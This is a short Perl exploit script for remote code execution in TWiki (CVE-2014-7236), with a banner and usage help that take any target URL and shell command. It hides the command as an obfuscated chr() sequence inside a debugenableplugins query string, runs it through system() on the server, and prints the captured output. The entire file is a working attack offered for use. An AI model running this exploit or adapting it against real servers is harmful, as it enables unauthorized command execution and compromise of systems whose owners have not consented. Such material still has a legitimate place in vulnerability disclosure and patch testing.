#!/usr/bin/perl
=cut
TWiki code execution CVE-2014-7236
m0nad <m0nad/at/email.com>
ref: http://seclists.org/fulldisclosure/2014/Oct/44
=cut
use LWP::Simple;
use strict;
use diagnostics;
use warnings;
sub banner
{
	print "[*] TWiki code execution CVE-2014-7236\n";
	print "[*] m0nad <m0nad/at/email.com>\n";
}
sub usage
{
	print "[?] usage: perl $0 <host> [cmd]\n";
	print "[?] ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n";
	exit;
}
sub exploit
{
	my ($host, $cmd) = @_;
	$cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl";
	my $byte =  join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));
	my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit";

	my $res = get $host . $payload;
	print "[-] Exploit Failed\n" and exit unless ($res =~ m/start_xpl\n(.*?)end_xpl/ms);
	print "[+] $1";
}
banner();
my $host = shift || usage();
my $cmd = shift || "echo Vulnerable!";
exploit($host, $cmd);